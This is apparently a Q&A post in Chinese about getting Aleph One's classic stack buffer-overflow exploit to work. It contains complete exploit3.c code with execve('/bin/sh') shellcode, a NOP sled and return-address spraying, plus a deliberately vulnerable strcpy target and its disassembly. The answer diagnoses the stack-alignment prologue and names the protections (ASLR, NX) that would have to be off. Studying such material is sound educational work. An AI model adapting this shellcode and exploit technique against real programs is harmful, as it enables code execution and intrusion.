我想用 C 编写 shellcode，使缓冲区溢出并执行 /bin/sh


我试图让缓冲区溢出并运行 shellcode 来执行 /bin/sh。

对于我们的缓冲区大小,一个好的选择比我们尝试溢出的缓冲区大小大约多100个字节。这会将我们的代码放置在我们尝试溢出的缓冲区的末尾,为NOP留出了很多空间,但是仍然用我们猜测的地址覆盖了返回地址。我们尝试溢出的缓冲区长512个字节,因此我们将使用612。

exploit3.c

#include <errno.h>
#include <limits.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Tunables for the egg layout (see main()):
 *   DEFAULT_OFFSET       subtracted from the current %esp to form the guessed
 *                        return address (argv[2] overrides it)
 *   DEFAULT_BUFFER_SIZE  size of the egg; 512 equals the target's xbuff[512],
 *                        the write-up above recommends ~100 bytes more (612)
 *   NOP                  x86 `nop` (0x90), used for the sled
 */
#define DEFAULT_OFFSET                    0 
#define DEFAULT_BUFFER_SIZE             512 
#define NOP                            0x90 
/*
 * Aleph One's classic i386 execve("/bin/sh") shellcode: 45 bytes, none of
 * them 0x00, so strcpy() in the target copies it whole. Decoded:
 *   eb 1f            jmp  +0x1f            -> to the call at the end
 *   5e               pop  %esi             ; %esi = address of "/bin/sh"
 *   89 76 08         mov  %esi,0x8(%esi)   ; argv[0] = path
 *   31 c0            xor  %eax,%eax
 *   88 46 07         mov  %al,0x7(%esi)    ; NUL-terminate "/bin/sh"
 *   89 46 0c         mov  %eax,0xc(%esi)   ; argv[1] = NULL (also used as envp)
 *   b0 0b            mov  $0xb,%al         ; __NR_execve
 *   89 f3            mov  %esi,%ebx        ; path
 *   8d 4e 08         lea  0x8(%esi),%ecx   ; argv
 *   8d 56 0c         lea  0xc(%esi),%edx   ; envp (points at the NULL above)
 *   cd 80            int  $0x80
 *   31 db 89 d8 40 cd 80                   ; exit(0) if execve returns
 *   e8 dc ff ff ff   call -0x24            -> back to the pop; pushes the
 *                                             address of the string below
 *   "/bin/sh"
 * The code patches itself (the 9 bytes following the string), so it must
 * land in memory that is both writable and executable - here, the copy of
 * the environment string on the target's stack.
 */
char shellcode[] =  
            "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"  
            "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"  
            "\x80\xe8\xdc\xff\xff\xff/bin/sh"; 

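/*
 * Return the current stack pointer (x86 only: %esp, i.e. the low 32 bits of
 * the stack pointer when built on x86-64). The exploit uses it as the starting
 * guess for where the target's stack - and hence the egg - will be.
 *
 * The original listing left the value in %eax and fell off the end of a
 * non-void function; that is undefined behaviour in C and only worked because
 * of the i386 calling convention. An asm output operand plus an explicit
 * return makes the result well defined.
 */
unsigned long get_sp(void)
{
    unsigned int sp;

    __asm__ volatile ("movl %%esp, %0" : "=r" (sp));
    return sp;
}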
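/* Parse a decimal integer command-line argument.
 * Returns 1 and stores the value in *out on success; 0 if the string is
 * empty, has trailing junk, or does not fit in an int (atoi() silently
 * returned 0 or a truncated value in those cases). */
static int parse_int_arg(const char *s, int *out)
{
    char *end;
    long v;

    if (s == NULL || *s == '\0')
        return 0;
    errno = 0;
    v = strtol(s, &end, 10);
    if (errno == ERANGE || *end != '\0' || v < INT_MIN || v > INT_MAX)
        return 0;
    *out = (int)v;
    return 1;
}

/*
 * Build the "EGG" environment string and start a shell that inherits it.
 *
 * Egg layout (Aleph One's exploit3 layout, bsize bytes):
 *   [0, 4)                   "EGG=" (replaces the first four NOPs)
 *   [4, bsize/2)             NOP sled
 *   [mid, mid+strlen(sc))    shellcode, centred on bsize/2
 *   [.., bsize-1)            the guessed return address, repeated every 4 bytes
 *   [bsize-1]                '\0'
 *
 * argv[1] (optional): bsize, total size of the egg (default 512).
 * argv[2] (optional): offset subtracted from the current %esp to form the
 *                     guessed address (default 0; negative values allowed).
 *
 * Changes from the original listing:
 *   - the address fill stored a `long` every 4 bytes. On a 64-bit host that is
 *     8 bytes per step (twice the buffer), and for bsize not a multiple of 4
 *     it also ran past the allocation. The fill is now a 32-bit pattern (the
 *     target is i386) and bounded by bsize.
 *   - bsize/offset are validated; too-small sizes placed the shellcode in
 *     front of the buffer or under the "EGG=" prefix.
 *   - int main, and failures exit non-zero instead of 0.
 */
int main(int argc, char *argv[])
{
    char *buff;
    unsigned long addr;
    uint32_t addr32;
    int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE;
    size_t sclen = strlen(shellcode);
    size_t sc_start, i;

    if (argc > 1 && !parse_int_arg(argv[1], &bsize)) {
        fprintf(stderr, "Bad buffer size: %s\n", argv[1]);
        exit(EXIT_FAILURE);
    }
    if (argc > 2 && !parse_int_arg(argv[2], &offset)) {
        fprintf(stderr, "Bad offset: %s\n", argv[2]);
        exit(EXIT_FAILURE);
    }

    /* The shellcode is centred on bsize/2, as in the original. It must start
     * after the 4-byte "EGG=" prefix and end before the terminating NUL,
     * otherwise the copies below write outside buff. */
    if (bsize <= 0 || (size_t)bsize / 2 < sclen / 2) {
        fprintf(stderr, "Buffer size %d too small for the egg.\n", bsize);
        exit(EXIT_FAILURE);
    }
    sc_start = (size_t)bsize / 2 - sclen / 2;
    if (sc_start < 4 || sc_start + sclen > (size_t)bsize - 1) {
        fprintf(stderr, "Buffer size %d too small for the egg.\n", bsize);
        exit(EXIT_FAILURE);
    }

    buff = malloc((size_t)bsize);
    if (buff == NULL) {
        fprintf(stderr, "Can't allocate memory.\n");
        exit(EXIT_FAILURE);
    }

    /* Guess: the target's stack lies roughly where ours does. */
    addr = get_sp() - (unsigned long)offset;
    printf("Using address: 0x%lx\n", addr);

    /* Fill the whole egg with the guessed address, 4 bytes at a time, in host
     * byte order (host and i386 target are both little-endian). A trailing
     * partial word gets the leading bytes only; nothing is written past
     * buff[bsize-1]. */
    addr32 = (uint32_t)addr;
    for (i = 0; i < (size_t)bsize; i += 4) {
        size_t n = (size_t)bsize - i;
        memcpy(buff + i, &addr32, n < 4 ? n : 4);
    }

    memset(buff, NOP, (size_t)bsize / 2);      /* NOP sled over the first half */
    memcpy(buff + sc_start, shellcode, sclen); /* shellcode, centred on bsize/2 */
    buff[bsize - 1] = '\0';                    /* environment strings are NUL-terminated */
    memcpy(buff, "EGG=", 4);                   /* variable name; replaces 4 NOPs */

    /* putenv() keeps buff itself (it does not copy), so buff must stay
     * allocated for as long as the environment is in use - it is
     * intentionally never freed here. */
    if (putenv(buff) != 0) {
        fprintf(stderr, "putenv failed.\n");
        exit(EXIT_FAILURE);
    }

    /* putenv() only changed this process's environment. Spawn a child shell
     * so the user can run the target with $EGG from an environment that has
     * it; system() with a fixed path is intentional here. */
    system("/bin/bash");
    return 0;
}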


vulnerable.c

#include <unistd.h>
#include <string.h>


/*
 * Deliberately vulnerable target: copies argv[1] into a fixed 512-byte stack
 * buffer with strcpy(), which performs no length check, so an argument of 512
 * or more characters overwrites whatever the compiler placed above xbuff (in
 * the build disassembled below: the saved %ecx at -0x4(%ebp), the saved %ebp
 * and the return-address copy). Nothing else is done with the buffer; the
 * program always returns 0.
 */
int main(int argc, char *argv[])
{
    char xbuff[512];

    /* No argument: nothing to copy. */
    if (argc < 2)
        return 0;

    /* Unbounded copy - this is the overflow. */
    strcpy(xbuff, argv[1]);
    return 0;
}

vulnerable.c 中 main 函数的汇编代码（32 位构建，xbuff 位于 -0x208(%ebp)）

(gdb) disass main
Dump of assembler code for function main:
   0x0804840b <+0>: lea    0x4(%esp),%ecx
   0x0804840f <+4>: and    $0xfffffff0,%esp
   0x08048412 <+7>: pushl  -0x4(%ecx)
   0x08048415 <+10>:    push   %ebp
   0x08048416 <+11>:    mov    %esp,%ebp
   0x08048418 <+13>:    push   %ecx
   0x08048419 <+14>:    sub    $0x204,%esp
   0x0804841f <+20>:    mov    %ecx,%eax
   0x08048421 <+22>:    cmpl   $0x1,(%eax)
   0x08048424 <+25>:    jle    0x8048441 <main+54>
   0x08048426 <+27>:    mov    0x4(%eax),%eax
   0x08048429 <+30>:    add    $0x4,%eax
   0x0804842c <+33>:    mov    (%eax),%eax
   0x0804842e <+35>:    sub    $0x8,%esp
   0x08048431 <+38>:    push   %eax
   0x08048432 <+39>:    lea    -0x208(%ebp),%eax
   0x08048438 <+45>:    push   %eax
   0x08048439 <+46>:    call   0x80482e0 <strcpy@plt>
   0x0804843e <+51>:    add    $0x10,%esp
   0x08048441 <+54>:    mov    $0x0,%eax
   0x08048446 <+59>:    mov    -0x4(%ebp),%ecx
   0x08048449 <+62>:    leave  
   0x0804844a <+63>:    lea    -0x4(%ecx),%esp
   0x0804844d <+66>:    ret    
End of assembler dump.


程序运行了，但没有得到 /bin/sh，直接回到了提示符：

[aleph1]$ ./exploit3 612
Using address: 0xbffffdb4
[aleph1]$ ./vulnerable $EGG
[aleph1]$

预期输出是:


[aleph1]$ ./exploit3 612
Using address: 0xbffffdb4
[aleph1]$ ./vulnerable $EGG
$ exit
[aleph1]$

问题出在哪里？

第二个问题

exploit3.c 为什么要在 main() 的最后运行 system("/bin/bash")？

...

c linux x86 buffer-overflow shellcode

exploit3 在 main() 的最后运行 system("/bin/bash")，是因为 putenv(buff) 只改变了 exploit3 自己这个进程的环境变量，进程一退出它就没了；在设置好 EGG 之后再启动一个子 shell，子进程会继承这份环境，于是才能在其中执行 ./vulnerable $EGG。也正因为 putenv() 保存的是 buff 这个指针本身（不复制内容），buff 不能在 system() 之前释放。

关于第一个问题：从贴出的反汇编看，这个 main 带有 GCC 的栈对齐序言（lea 0x4(%esp),%ecx / and $0xfffffff0,%esp），把 %ecx 保存在 -0x4(%ebp)，返回前先用 mov -0x4(%ebp),%ecx 和 lea -0x4(%ecx),%esp 恢复 %esp 再 ret。而 xbuff 位于 -0x208(%ebp)，溢出最先覆盖的就是这个保存的 %ecx，于是 ret 实际是从「写入 -0x4(%ebp) 的那个值 − 4」处取返回地址，并不像 Aleph One 论文所假设的那样直接使用被覆盖的返回地址；原始 exploit3 的填充布局因此不能直接套用到这个构建上。此外，反汇编里看不到 canary（没有读 %gs:0x14），说明栈保护已关闭，但 ASLR 和不可执行栈（NX）是否关闭无法从贴出的信息判断；这两者任一开着，即使地址猜对也得不到 shell，需要先确认（例如 /proc/sys/kernel/randomize_va_space 为 0、以 -z execstack 链接）。
